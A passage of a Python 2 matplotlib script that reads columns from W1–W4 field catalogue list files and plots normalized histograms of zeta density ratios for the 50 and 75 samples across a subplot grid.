(str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W1_75 = q_W1_75read[q_W1_75read < 10]\nq_W2_75read = np.loadtxt('fieldshistW2_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W2_75 = q_W2_75read[q_W2_75read < 10]\nq_W3_75read = np.loadtxt('fieldshistW3_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W3_75 = q_W3_75read[q_W3_75read < 10]\nq_W4_75read = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_75 = q_W4_75read[q_W4_75read < 10]\n\nplt.subplot(4,5,11)\nrangemax=4\nn_q_W1_50, bins_q_W1_50, patches = plt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W2_50, bins_q_W2_50, patches = plt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W3_50, bins_q_W3_50, patches = plt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W4_50, bins_q_W4_50, patches = plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W1_75, bins_q_W1_75, patches = plt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nn_q_W2_75, bins_q_W2_75, patches = plt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nn_q_W3_75, bins_q_W3_75, patches = plt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nn_q_W4_75, bins_q_W4_75, patches = plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nplt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nplt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nplt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nplt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nax=plt.subplot(4,5,11)\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W1_50[np.argmax(n_q_W1_50)],np.average(q_W1_50),np.median(q_W1_50))\nax.text(0.15, 0.8, s, fontsize=5, color='b',transform=ax.transAxes)\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W2_50[np.argmax(n_q_W2_50)],np.average(q_W2_50),np.median(q_W2_50))\nax.text(0.15, 0.6, s, fontsize=5, color='g',transform=ax.transAxes)\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W3_50[np.argmax(n_q_W3_50)],np.average(q_W3_50),np.median(q_W3_50))\nax.text(0.15, 0.4, s, fontsize=5, color='r',transform=ax.transAxes)\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W4_50[np.argmax(n_q_W4_50)],np.average(q_W4_50),np.median(q_W4_50))\nax.text(0.15, 0.2, s, fontsize=5, color='k',transform=ax.transAxes)\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W1_75[np.argmax(n_q_W1_75)],np.average(q_W1_75),np.median(q_W1_75))\nax.text(0.15, 0.7, s, fontsize=5, color='b',transform=ax.transAxes)\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W2_75[np.argmax(n_q_W2_75)],np.average(q_W2_75),np.median(q_W2_75))\nax.text(0.15, 0.5, s, fontsize=5, color='g',transform=ax.transAxes)\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W3_75[np.argmax(n_q_W3_75)],np.average(q_W3_75),np.median(q_W3_75))\nax.text(0.15, 0.3, s, fontsize=5, color='r',transform=ax.transAxes)\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W4_75[np.argmax(n_q_W4_75)],np.average(q_W4_75),np.median(q_W4_75))\nax.text(0.15, 0.1, s, fontsize=5, color='k',transform=ax.transAxes)\nplt.xlabel(r'$\\zeta_\\frac{z}{r}$', fontsize=15)\nplt.ylabel(\"Normalized cnts\", fontsize=7)\nplt.tick_params(axis='x', labelsize=6)\nplt.tick_params(axis='y', labelsize=6)\nplt.setp(plt.xticks()[1], rotation=90)\n\nsubplot = 9\nprint \"finished subplot %d/16; fraction of points inside the q < 10 cut: \\n W1_50 %.3f W1_75 %.3f \\n W2_50 %.3f W2_75 %.3f \\n W3_50 %.3f W3_75 %.3f \\n W4_50 %.3f W4_75 %.3f \" % (subplot, float(q_W1_50.size)/q_W1_50read.size, float(q_W1_75.size)/q_W1_75read.size, float(q_W2_50.size)/q_W2_50read.size, float(q_W2_75.size)/q_W2_75read.size, float(q_W3_50.size)/q_W3_50read.size, float(q_W3_75.size)/q_W3_75read.size, float(q_W4_50.size)/q_W4_50read.size, float(q_W4_75.size)/q_W4_75read.size)\n\ncols=19\nq_W1_50read = np.loadtxt('fieldshistW1_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W1_50 = q_W1_50read[q_W1_50read < 10]\nq_W2_50read = np.loadtxt('fieldshistW2_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W2_50 = q_W2_50read[q_W2_50read < 10]\nq_W3_50read = np.loadtxt('fieldshistW3_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W3_50 = q_W3_50read[q_W3_50read < 10]\nq_W4_50read = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_50 = q_W4_50read[q_W4_50read < 10]\nq_W1_75read = np.loadtxt('fieldshistW1_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W1_75 = q_W1_75read[q_W1_75read < 10]\nq_W2_75read = np.loadtxt('fieldshistW2_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W2_75 = q_W2_75read[q_W2_75read < 10]\nq_W3_75read = np.loadtxt('fieldshistW3_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W3_75 = q_W3_75read[q_W3_75read < 10]\nq_W4_75read = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_75 = q_W4_75read[q_W4_75read < 10]\n\nplt.subplot(4,5,12)\nrangemax=7\nn_q_W1_50, bins_q_W1_50, patches = plt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W2_50, bins_q_W2_50, patches = plt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W3_50, bins_q_W3_50, patches = plt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W4_50, bins_q_W4_50, patches = plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W1_75, bins_q_W1_75, patches = plt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nn_q_W2_75, bins_q_W2_75, patches = plt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nn_q_W3_75, bins_q_W3_75, patches = plt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nn_q_W4_75, bins_q_W4_75, patches = plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nplt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nplt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nplt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nplt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nax=plt.subplot(4,5,12)\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W1_50[np.argmax(n_q_W1_50)],np.average(q_W1_50),np.median(q_W1_50))\nax.text(0.15, 0.8, s, fontsize=5, color='b',transform=ax.transAxes)\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W2_50[np.argmax(n_q_W2_50)],np.average(q_W2_50),np.median(q_W2_50))\nax.text(0.15, 0.6, s, fontsize=5, color='g',transform=ax.transAxes)\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W3_50[np.argmax(n_q_W3_50)],np.average(q_W3_50),np.median(q_W3_50))\nax.text(0.15, 0.4, s, fontsize=5, color='r',transform=ax.transAxes)\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W4_50[np.argmax(n_q_W4_50)],np.average(q_W4_50),np.median(q_W4_50))\nax.text(0.15, 0.2, s, fontsize=5, color='k',transform=ax.transAxes)\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W1_75[np.argmax(n_q_W1_75)],np.average(q_W1_75),np.median(q_W1_75))\nax.text(0.15, 0.7, s, fontsize=5, color='b',transform=ax.transAxes)\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W2_75[np.argmax(n_q_W2_75)],np.average(q_W2_75),np.median(q_W2_75))\nax.text(0.15, 0.5, s, fontsize=5, color='g',transform=ax.transAxes)\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W3_75[np.argmax(n_q_W3_75)],np.average(q_W3_75),np.median(q_W3_75))\nax.text(0.15, 0.3, s, fontsize=5, color='r',transform=ax.transAxes)\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W4_75[np.argmax(n_q_W4_75)],np.average(q_W4_75),np.median(q_W4_75))\nax.text(0.15, 0.1, s, fontsize=5, color='k',transform=ax.transAxes)\nplt.xlabel(r'$\\zeta_\\frac{M}{r}$', fontsize=15)\nplt.ylabel(\"Normalized cnts\", fontsize=7)\nplt.tick_params(axis='x', labelsize=6)\nplt.tick_params(axis='y', labelsize=6)\nplt.setp(plt.xticks()[1], rotation=90)\n\nsubplot = 10\nprint \"finished subplot %d/16; fraction of points inside the q < 10 cut: \\n W1_50 %.3f W1_75 %.3f \\n W2_50 %.3f W2_75 %.3f \\n W3_50 %.3f W3_75 %.3f \\n W4_50 %.3f W4_75 %.3f \" % (subplot, float(q_W1_50.size)/q_W1_50read.size, float(q_W1_75.size)/q_W1_75read.size, float(q_W2_50.size)/q_W2_50read.size, float(q_W2_75.size)/q_W2_75read.size, float(q_W3_50.size)/q_W3_50read.size, float(q_W3_75.size)/q_W3_75read.size, float(q_W4_50.size)/q_W4_50read.size, float(q_W4_75.size)/q_W4_75read.size)\n\ncols=21\nq_W1_50read = np.loadtxt('fieldshistW1_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W1_50 = q_W1_50read[q_W1_50read < 10]\nq_W2_50read = np.loadtxt('fieldshistW2_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W2_50 = q_W2_50read[q_W2_50read < 10]\nq_W3_50read = np.loadtxt('fieldshistW3_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W3_50 = q_W3_50read[q_W3_50read < 10]\nq_W4_50read = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_50 = q_W4_50read[q_W4_50read < 10]\nq_W1_75read = np.loadtxt('fieldshistW1_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W1_75 = q_W1_75read[q_W1_75read < 10]\nq_W2_75read = np.loadtxt('fieldshistW2_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W2_75 = q_W2_75read[q_W2_75read < 10]\nq_W3_75read = np.loadtxt('fieldshistW3_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W3_75 = q_W3_75read[q_W3_75read < 10]\nq_W4_75read = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_75 = q_W4_75read[q_W4_75read < 10]\n\nplt.subplot(4,5,13)\nrangemax=6\nn_q_W1_50, bins_q_W1_50, patches = plt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W2_50, bins_q_W2_50, patches = plt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W3_50, bins_q_W3_50, patches = plt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W4_50, bins_q_W4_50, patches = plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W1_75, bins_q_W1_75, patches = plt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nn_q_W2_75, bins_q_W2_75, patches = plt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nn_q_W3_75, bins_q_W3_75, patches = plt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nn_q_W4_75, bins_q_W4_75, patches = plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nplt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nplt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nplt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nplt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nax=plt.subplot(4,5,13)\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W1_50[np.argmax(n_q_W1_50)],np.average(q_W1_50),np.median(q_W1_50))\nax.text(0.15, 0.8, s, fontsize=5, color='b',transform=ax.transAxes)\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W2_50[np.argmax(n_q_W2_50)],np.average(q_W2_50),np.median(q_W2_50))\nax.text(0.15, 0.6, s, fontsize=5, color='g',transform=ax.transAxes)\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W3_50[np.argmax(n_q_W3_50)],np.average(q_W3_50),np.median(q_W3_50))\nax.text(0.15, 0.4, s, fontsize=5, color='r',transform=ax.transAxes)\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W4_50[np.argmax(n_q_W4_50)],np.average(q_W4_50),np.median(q_W4_50))\nax.text(0.15, 0.2, s, fontsize=5, color='k',transform=ax.transAxes)\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W1_75[np.argmax(n_q_W1_75)],np.average(q_W1_75),np.median(q_W1_75))\nax.text(0.15, 0.7, s, fontsize=5, color='b',transform=ax.transAxes)\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W2_75[np.argmax(n_q_W2_75)],np.average(q_W2_75),np.median(q_W2_75))\nax.text(0.15, 0.5, s, fontsize=5, color='g',transform=ax.transAxes)\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W3_75[np.argmax(n_q_W3_75)],np.average(q_W3_75),np.median(q_W3_75))\nax.text(0.15, 0.3, s, fontsize=5, color='r',transform=ax.transAxes)\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W4_75[np.argmax(n_q_W4_75)],np.average(q_W4_75),np.median(q_W4_75))\nax.text(0.15, 0.1, s, fontsize=5, color='k',transform=ax.transAxes)\nplt.xlabel(r'$\\zeta_\\frac{M^2}{r}$', fontsize=15)\nplt.ylabel(\"Normalized cnts\", fontsize=7)\nplt.tick_params(axis='x', labelsize=6)\nplt.tick_params(axis='y', labelsize=6)\nplt.setp(plt.xticks()[1], rotation=90)\n\nsubplot = 11\nprint \"finished subplot %d/16; fraction of points inside the q < 10 cut: \\n W1_50 %.3f W1_75 %.3f \\n W2_50 %.3f W2_75 %.3f \\n W3_50 %.3f W3_75 %.3f \\n W4_50 %.3f W4_75 %.3f \" % (subplot, float(q_W1_50.size)/q_W1_50read.size, float(q_W1_75.size)/q_W1_75read.size, float(q_W2_50.size)/q_W2_50read.size, float(q_W2_75.size)/q_W2_75read.size, float(q_W3_50.size)/q_W3_50read.size, float(q_W3_75.size)/q_W3_75read.size, float(q_W4_50.size)/q_W4_50read.size, float(q_W4_75.size)/q_W4_75read.size)\n\ncols=23\nq_W1_50read = np.loadtxt('fieldshistW1_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W1_50 = q_W1_50read[q_W1_50read < 10]\nq_W2_50read = np.loadtxt('fieldshistW2_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W2_50 = q_W2_50read[q_W2_50read < 10]\nq_W3_50read = np.loadtxt('fieldshistW3_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W3_50 = q_W3_50read[q_W3_50read < 10]\nq_W4_50read = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_50 = q_W4_50read[q_W4_50read < 10]\nq_W1_75read = np.loadtxt('fieldshistW1_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W1_75 = q_W1_75read[q_W1_75read < 10]\nq_W2_75read = np.loadtxt('fieldshistW2_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W2_75 = q_W2_75read[q_W2_75read < 10]\nq_W3_75read = np.loadtxt('fieldshistW3_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W3_75 = q_W3_75read[q_W3_75read < 10]\nq_W4_75read = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_75 = q_W4_75read[q_W4_75read < 10]\n\nplt.subplot(4,5,14)\nrangemax=6\nn_q_W1_50, bins_q_W1_50, patches = plt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W2_50, bins_q_W2_50, patches = plt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W3_50, bins_q_W3_50, patches = plt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W4_50, bins_q_W4_50, patches = plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W1_75, bins_q_W1_75, patches = plt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nn_q_W2_75, bins_q_W2_75, patches = plt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nn_q_W3_75, bins_q_W3_75, patches = plt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nn_q_W4_75, bins_q_W4_75, patches = plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nplt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nplt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nplt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nplt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nax=plt.subplot(4,5,14)\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W1_50[np.argmax(n_q_W1_50)],np.average(q_W1_50),np.median(q_W1_50))\nax.text(0.15, 0.8, s, fontsize=5, color='b',transform=ax.transAxes)\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W2_50[np.argmax(n_q_W2_50)],np.average(q_W2_50),np.median(q_W2_50))\nax.text(0.15, 0.6, s, fontsize=5, color='g',transform=ax.transAxes)\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W3_50[np.argmax(n_q_W3_50)],np.average(q_W3_50),np.median(q_W3_50))\nax.text(0.15, 0.4, s, fontsize=5, color='r',transform=ax.transAxes)\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W4_50[np.argmax(n_q_W4_50)],np.average(q_W4_50),np.median(q_W4_50))\nax.text(0.15, 0.2, s, fontsize=5, color='k',transform=ax.transAxes)\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W1_75[np.argmax(n_q_W1_75)],np.average(q_W1_75),np.median(q_W1_75))\nax.text(0.15, 0.7, s, fontsize=5, color='b',transform=ax.transAxes)\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W2_75[np.argmax(n_q_W2_75)],np.average(q_W2_75),np.median(q_W2_75))\nax.text(0.15, 0.5, s, fontsize=5, color='g',transform=ax.transAxes)\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W3_75[np.argmax(n_q_W3_75)],np.average(q_W3_75),np.median(q_W3_75))\nax.text(0.15, 0.3, s, fontsize=5, color='r',transform=ax.transAxes)\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W4_75[np.argmax(n_q_W4_75)],np.average(q_W4_75),np.median(q_W4_75))\nax.text(0.15, 0.1, s, fontsize=5, color='k',transform=ax.transAxes)\nplt.xlabel(r'$\\zeta_\\frac{M^3}{r}$', fontsize=15)\nplt.ylabel(\"Normalized cnts\", fontsize=7)\nplt.tick_params(axis='x', labelsize=6)\nplt.tick_params(axis='y', labelsize=6)\nplt.setp(plt.xticks()[1], rotation=90)\n\nsubplot = 12\nprint \"finished subplot %d/16; fraction of points inside the q < 10 cut: \\n W1_50 %.3f W1_75 %.3f \\n W2_50 %.3f W2_75 %.3f \\n W3_50 %.3f W3_75 %.3f \\n W4_50 %.3f W4_75 %.3f \" % (subplot, float(q_W1_50.size)/q_W1_50read.size, float(q_W1_75.size)/q_W1_75read.size, float(q_W2_50.size)/q_W2_50read.size, float(q_W2_75.size)/q_W2_75read.size, float(q_W3_50.size)/q_W3_50read.size, float(q_W3_75.size)/q_W3_75read.size, float(q_W4_50.size)/q_W4_50read.size, float(q_W4_75.size)/q_W4_75read.size)\n\ncols=25\nq_W1_50read = np.loadtxt('fieldshistW1_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W1_50 = q_W1_50read[q_W1_50read < 10]\nq_W2_50read = np.loadtxt('fieldshistW2_50_%s_%s_size%s_i%s.lst' % 